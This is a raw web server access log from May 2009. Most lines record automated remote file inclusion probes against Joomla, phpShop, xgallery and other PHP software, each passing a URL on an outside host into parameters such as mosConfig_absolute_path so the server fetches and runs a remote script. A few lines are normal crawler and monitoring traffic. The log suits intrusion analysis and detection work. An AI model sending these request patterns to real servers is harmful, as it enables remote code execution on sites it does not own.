110.45.144.106 - - [20/May/2009:06:18:13 -0400] "GET /logs/access_log.Q108090200//modules/TotalCalendar/about.php?inc_dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:18:17 -0400] "GET /logs/access_log.Q108091400//login.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.151.134.36 - - [20/May/2009:06:18:18 -0400] "GET /logs/error_log.Q108100400////?_SERVER[DOCUMENT_ROOT]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:18:20 -0400] "GET /logs/access_log.Q108091400//login.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.98.80.2 - - [20/May/2009:06:18:26 -0400] "GET /logs/access_log.Q109050700/main.php?sbp=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:18:26 -0400] "GET /logs/access_log.Q109050700/main.php?sbp=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:18:26 -0400] "GET /logs/access_log.Q109010700/test.php?sbp=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:18:26 -0400] "GET /test.php?sbp=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 206 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:18:26 -0400] "GET /logs/test.php?sbp=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 211 "-" "libwww-perl/5.79"
88.191.103.144 - - [20/May/2009:06:18:38 -0400] "GET /logs/error_log.Q108102500%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
72.30.142.171 - - [20/May/2009:06:18:40 -0400] "GET /logs/access_log.Q107121700 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
88.191.103.144 - - [20/May/2009:06:18:42 -0400] "GET /logs/error_log.Q108100400%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
88.191.103.144 - - [20/May/2009:06:18:49 -0400] "GET //update/update5.php?lang=http://champagnat87.com/id.txt???? HTTP/1.1" 404 217 "-" "libwww-perl/5.825"
209.59.12.99 - - [20/May/2009:06:18:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.98.80.2 - - [20/May/2009:06:18:59 -0400] "GET /logs/access_log.Q108091900/test.php?sbp=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
200.93.147.154 - - [20/May/2009:06:19:02 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
200.93.147.154 - - [20/May/2009:06:19:02 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 200 2095 "-" "Mozilla/5.0"
200.93.147.154 - - [20/May/2009:06:19:02 -0400] "GET /logs/error_log.Q108102500////?_SERVER[DOCUMENT_ROOT]=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
67.43.0.140 - - [20/May/2009:06:19:16 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
67.43.0.140 - - [20/May/2009:06:19:16 -0400] "GET /logs/access_log.Q109020100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.43.0.140 - - [20/May/2009:06:19:16 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.93.147.154 - - [20/May/2009:06:19:27 -0400] "GET /logs/error_log.Q108100400////?_SERVER[DOCUMENT_ROOT]=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:06:19:32 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:06:19:32 -0400] "GET /logs/access_log.Q108061500/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:06:19:32 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
88.191.103.144 - - [20/May/2009:06:19:35 -0400] "GET /logs/error_log.Q108032500//update/update5.php?lang=http://champagnat87.com/id.txt???? HTTP/1.1" 404 243 "-" "libwww-perl/5.825"
88.191.103.144 - - [20/May/2009:06:19:35 -0400] "GET //update/update5.php?lang=http://champagnat87.com/id.txt???? HTTP/1.1" 404 217 "-" "libwww-perl/5.825"
88.191.103.144 - - [20/May/2009:06:19:35 -0400] "GET /logs//update/update5.php?lang=http://champagnat87.com/id.txt???? HTTP/1.1" 404 222 "-" "libwww-perl/5.825"
162.129.47.11 - - [20/May/2009:06:19:39 -0400] "GET //authentication/errors.php?error=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
162.129.47.11 - - [20/May/2009:06:19:39 -0400] "GET /logs//authentication/errors.php?error=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
162.129.47.11 - - [20/May/2009:06:19:39 -0400] "GET /logs/access_log.Q108090900//authentication/errors.php?error=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:06:19:42 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:06:19:42 -0400] "GET /logs/access_log.Q108061500/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:06:19:45 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:06:19:51 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:06:19:51 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:06:19:51 -0400] "GET /logs/access_log.Q108061500%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:06:19:52 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:06:19:52 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:06:19:52 -0400] "GET /logs/access_log.Q108061500%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
67.43.0.140 - - [20/May/2009:06:20:06 -0400] "GET /nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
67.43.0.140 - - [20/May/2009:06:20:06 -0400] "GET /logs/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
67.43.0.140 - - [20/May/2009:06:20:11 -0400] "GET /logs/access_log.Q109020100%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:06:20:28 -0400] "GET /logs/access_log.Q108090100%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
67.43.0.140 - - [20/May/2009:06:20:29 -0400] "GET /logs/access_log.Q109011400%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:06:20:33 -0400] "GET /logs/access_log.Q108090100%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
174.34.129.58 - - [20/May/2009:06:20:38 -0400] "GET /logs/access_log.Q108091400%20/test.php?sbp=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.820"
174.34.129.58 - - [20/May/2009:06:20:38 -0400] "GET /logs/access_log.Q108091400%20/test.php?sbp=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.820"
216.151.134.36 - - [20/May/2009:06:21:44 -0400] "GET /logs/error_log.Q108102500%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
216.151.134.36 - - [20/May/2009:06:21:49 -0400] "GET /logs/error_log.Q108100400%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
200.93.147.154 - - [20/May/2009:06:22:21 -0400] "GET /logs/error_log.Q108102500%20%20////?_SERVER[DOCUMENT_ROOT]=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
200.93.147.154 - - [20/May/2009:06:22:42 -0400] "GET /logs/error_log.Q108100400%20%20////?_SERVER[DOCUMENT_ROOT]=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:06:23:03 -0400] "GET /logs/access_log.Q108090100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:06:23:19 -0400] "GET /logs/access_log.Q108090100//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
118.45.190.166 - - [20/May/2009:06:23:21 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
118.45.190.166 - - [20/May/2009:06:23:25 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
118.45.190.166 - - [20/May/2009:06:23:25 -0400] "GET /logs/access_log.Q109030500%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.27.203.107 - - [20/May/2009:06:23:43 -0400] "GET /logs/errors.php?error=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.27.203.107 - - [20/May/2009:06:23:43 -0400] "GET /logs/access_log.Q108111500/errors.php?error=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.27.203.107 - - [20/May/2009:06:23:43 -0400] "GET /errors.php?error=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:06:23:44 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:06:23:44 -0400] "GET /logs/access_log.Q108090100/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:06:23:44 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:06:23:51 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:06:23:51 -0400] "GET /logs/access_log.Q108090100/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:06:23:51 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
118.45.190.166 - - [20/May/2009:06:24:01 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
118.45.190.166 - - [20/May/2009:06:24:01 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
118.45.190.166 - - [20/May/2009:06:24:01 -0400] "GET /logs/access_log.Q109030500%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [20/May/2009:06:24:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.143.98.5 - - [20/May/2009:06:24:04 -0400] "GET /logs/access_log.Q108062800/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
218.27.203.107 - - [20/May/2009:06:24:08 -0400] "GET /logs/access_log.Q108111500%20%20/errors.php?error=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.27.203.107 - - [20/May/2009:06:24:08 -0400] "GET /errors.php?error=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.27.203.107 - - [20/May/2009:06:24:09 -0400] "GET /logs/errors.php?error=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:06:24:11 -0400] "GET /logs/access_log.Q108062800/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
88.191.103.144 - - [20/May/2009:06:24:18 -0400] "GET /logs/access_log.Q108090200/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
88.191.103.144 - - [20/May/2009:06:24:18 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
88.191.103.144 - - [20/May/2009:06:24:18 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
38.98.245.226 - - [20/May/2009:06:24:23 -0400] "GET /logs/access_log.Q108112400//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.kojo.com.tw/kojo//cache/lang/id.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
38.98.245.226 - - [20/May/2009:06:24:23 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.kojo.com.tw/kojo//cache/lang/id.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
38.98.245.226 - - [20/May/2009:06:24:23 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.kojo.com.tw/kojo//cache/lang/id.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
88.191.103.144 - - [20/May/2009:06:24:23 -0400] "GET /logs/access_log.Q108122500/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.249.72.114 - - [20/May/2009:06:24:25 -0400] "GET /images/headphones2.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
218.27.203.107 - - [20/May/2009:06:24:29 -0400] "GET /logs/access_log.Q109050700/errors.php?error=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.27.203.107 - - [20/May/2009:06:24:50 -0400] "GET /logs/access_log.Q109050700%20%20/errors.php?error=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.32.100.130 - - [20/May/2009:06:25:18 -0400] "GET /logs/rss.php?phpraid_dir=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
200.32.100.130 - - [20/May/2009:06:25:21 -0400] "GET /logs/access_log.Q109051200%20/rss.php?phpraid_dir=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
200.32.100.130 - - [20/May/2009:06:25:21 -0400] "GET /rss.php?phpraid_dir=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 205 "-" "libwww-perl/5.805"
88.191.103.144 - - [20/May/2009:06:26:11 -0400] "GET /logs/access_log.Q108090200%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
88.191.103.144 - - [20/May/2009:06:26:11 -0400] "GET /logs/access_log.Q108122500%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
38.98.245.226 - - [20/May/2009:06:26:49 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.kojo.com.tw/kojo//cache/lang/id.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
200.93.147.154 - - [20/May/2009:06:26:55 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
200.93.147.154 - - [20/May/2009:06:26:55 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
200.93.147.154 - - [20/May/2009:06:26:55 -0400] "GET /logs/access_log.Q108070500/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.93.147.154 - - [20/May/2009:06:26:58 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
200.93.147.154 - - [20/May/2009:06:26:58 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
200.93.147.154 - - [20/May/2009:06:27:01 -0400] "GET /logs/access_log.Q108090200/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.93.147.154 - - [20/May/2009:06:27:05 -0400] "GET /logs/access_log.Q108122500/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.151.134.36 - - [20/May/2009:06:27:24 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
216.151.134.36 - - [20/May/2009:06:27:24 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
216.151.134.36 - - [20/May/2009:06:27:24 -0400] "GET /logs/access_log.Q108090200/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.32.100.130 - - [20/May/2009:06:27:25 -0400] "GET /rss.php?phpraid_dir=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 205 "-" "libwww-perl/5.805"
200.32.100.130 - - [20/May/2009:06:27:25 -0400] "GET /logs/rss.php?phpraid_dir=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
200.32.100.130 - - [20/May/2009:06:27:25 -0400] "GET /logs/error_log.Q108081200%20/rss.php?phpraid_dir=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
200.32.100.130 - - [20/May/2009:06:27:28 -0400] "GET /logs/access_log.Q109051200%20/rss.php?phpraid_dir=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
218.27.203.107 - - [20/May/2009:06:27:33 -0400] "GET /errors.php?error=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.27.203.107 - - [20/May/2009:06:27:33 -0400] "GET /logs/access_log.Q108102400/errors.php?error=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.27.203.107 - - [20/May/2009:06:27:33 -0400] "GET /logs/errors.php?error=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.93.147.154 - - [20/May/2009:06:27:36 -0400] "GET /logs/access_log.Q108051700/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.184.79.205 - - [20/May/2009:06:27:36 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
91.184.79.205 - - [20/May/2009:06:27:36 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
216.151.134.36 - - [20/May/2009:06:27:36 -0400] "GET /logs/access_log.Q108122500/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.184.79.205 - - [20/May/2009:06:27:53 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
91.184.79.205 - - [20/May/2009:06:27:53 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
218.27.203.107 - - [20/May/2009:06:27:58 -0400] "GET /logs/access_log.Q108111500/errors.php?error=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
58.27.163.244 - - [20/May/2009:06:28:17 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
58.27.163.244 - - [20/May/2009:06:28:17 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
88.191.103.144 - - [20/May/2009:06:28:29 -0400] "GET /logs/access_log.Q108090200////?_SERVER[DOCUMENT_ROOT]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
58.27.163.244 - - [20/May/2009:06:28:30 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
58.27.163.244 - - [20/May/2009:06:28:30 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
